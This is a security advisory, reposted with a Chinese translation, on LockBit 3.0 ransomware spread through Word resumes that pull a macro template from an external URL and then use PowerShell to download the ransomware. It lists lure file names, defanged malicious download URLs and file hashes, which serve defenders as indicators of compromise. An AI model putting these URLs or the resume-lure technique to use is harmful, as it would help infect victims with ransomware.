AhnLab SEcurity intelligence Center (ASEC) has identified that LockBit ransomware is being distributed via Word files since last month. A notable point is that the LockBit ransomware is usually distributed by disguising itself as resumes, and recently found malicious Word files were also disguised as resumes [1]. The distribution method of LockBit ransomware using external URLs in Word files was first found in 2022 [2]. The recently discovered file names of malicious Word files are as follows.
AhnLab 安全情报中心 (ASEC) 已确定自上个月以来,LockBit 勒索软件正在通过 Word 文件分发。值得注意的一点是,LockBit 勒索软件通常是通过伪装成简历来分发的,最近发现的恶意 Word 文件也被伪装成简历 [1]。LockBit 勒索软件在 Word 文件中使用 External URL 的分发方法于 2022 年首次被发现 [2]。最近发现的恶意 Word 文件的文件名如下。
File name 文件名
[[[231227_Yang**]]].docx
231227_Lee**.docx
231227Yu**,docx 231227Yu**,docx
Kim**.docx 金**.docx
SeonWoo**.docx
Working meticulously! A leader in communication!.docx
一丝不苟!沟通的领导者!博士
Candidate with a kind attitude and a big smile.docx
态度和蔼可亲,笑容灿烂的候选人.docx
I will work with an enthusiastic attitude.docx
我将以热情的态度工作.docx
External link is included in the internal Word file \word\_rels\settings.xml.rels, and the document file that has additional malicious macro code is downloaded from the external URL when the Word file is run. Most of the properties of the documents were similar to that of documents distributed in the past, thus it is assumed that the documents used in the past are being reused.
外部链接包含在内部 Word 文件 \word\_rels\settings.xml.rels 中,并且在运行 Word 文件时从外部 URL 下载具有其他恶意宏代码的文档文件。文档的大多数属性与过去分发的文档的属性相似,因此假定过去使用的文档正在被重复使用。
As shown in the figure below, images are included in the file to prompt the users to run malicious VBA macro. When the macro is run, the VBA macro included in the document file downloaded from the external URL is run.
如下图所示,文件中包含图像,以提示用户运行恶意 VBA 宏。运行宏时,将运行从外部 URL 下载的文档文件中包含的 VBA 宏。
Identified external URLs are as follows.
标识的外部 URL 如下所示。
- hxxps://viviendas8[.]com/bb/qhrx1h.dotm
- hxxps://learndash.825testsites[.]com/b/fgi5k8.dotm
- hxxps://neverlandserver.nn[.]pe/b/ck0zcn.dotm
The image below shows the macro code that was run through the downloaded document files. It is obfuscated similarly to the identified cases of VBA macro in 2022, and PowerShell is ultimately run to download and execute LockBit ransomware.
下图显示了通过下载的文档文件运行的宏代码。它与 2022 年确定的 VBA 宏案例类似,最终运行 PowerShell 以下载和执行 LockBit 勒索软件。
Identified download URLs of LockBit ransomware are as follows.
已识别的 LockBit 勒索软件的下载 URL 如下。
- hxxps://learndash.825testsites[.]com/b/abc.exe
- hxxps://viviendas8[.]com/bb/abc.exe
- hxxps://neverlandserver.nn[.]pe/b/abc.exe
When the downloaded LockBit 3.0 ransomware is executed, it encrypts the files in the user’s PC.
当下载的 LockBit 3.0 勒索软件被执行时,它会加密用户 PC 中的文件。
As various malware other than LockBit ransomware are also being distributed under the guise of resumes, the users are advised to be extra cautious.
由于 LockBit 勒索软件以外的各种恶意软件也以简历为幌子分发,因此建议用户格外小心。
[File Detection] [文件检测]
Downloader/DOC.Macro (2023.12.29.03)
下载器/DOC.宏观 (2023.12.29.03)
Downloader/DOC.Agent (2024.01.02.03)
下载器/DOC.代理 (2024.01.02.03)
Downloader/XML.Exernal (2024.01.09.00)
下载器/XML.Exernal (2024.01.09.00)
Malware/Win.AGEN.R417906 (2021.04.27.03)
恶意软件/Win.AGEN.R417906 (2021.04.27.03)
Trojan/Win.Generic.R629778(2023.12.30.01)
特洛伊木马/Win.Generic.R629778(2023.12.30.01)
Ransomware/Win.LockBit.XM170 (2023.10.05.02)
勒索软件/Win.LockBit.XM170 (2023.10.05.02)
[Behavior Detection] [行为检测]
Ransom/MDP.Event.M4194 赎金/MDP。事件.M4194
[IOC Info] [国际奥委会信息]
– DOCX – DOCX文件
fad3e205ac4613629fbcdc428ce456e5
6424cc2085165d8b5b7b06d5aaddca9a
1b95af49b05953920dbfe8b042db9285
11a65e914f9bed73946f057f6e6aa347
60684527583c5bb17dcaad1eeb701434
61fda72ff72cdc39c4b4df0e9c099293
16814dffbcaf12ccb579d5c59e151d16
9f80a3584dd2c3c44b307f0c0a6ca1e6
– DOTM – 多特姆
f2a9bc0e23f6ad044cb7c835826fa8fe
4df66a06d2f1b52ab30422cbee2a4356
26b629643be8739c4646db48ff4ed4af
– EXE – EXE文件
7a83a738db05418c0ae6795b317a45f9
bcf0e5d50839268ab93d1210cf08fa37
ab98774aefe47c2b585ac1f9feee0f19
URL
hxxps://viviendas8[.]com/bb/qhrx1h.dotm
hxxps://learndash.825testsites[.]com/b/fgi5k8.dotm
hxxps://neverlandserver.nn[.]pe/b/ck0zcn.dotm
hxxps://learndash.825testsites[.]com/b/abc.exe
hxxps://viviendas8[.]com/bb/abc.exe
hxxps://neverlandserver.nn[.]pe/b/abc.exe
原文始发于ASEC:LockBit Ransomware Distributed via Word Files Disguised as Resumes
转载请注明:LockBit Ransomware Distributed via Word Files Disguised as Resumes | CTF导航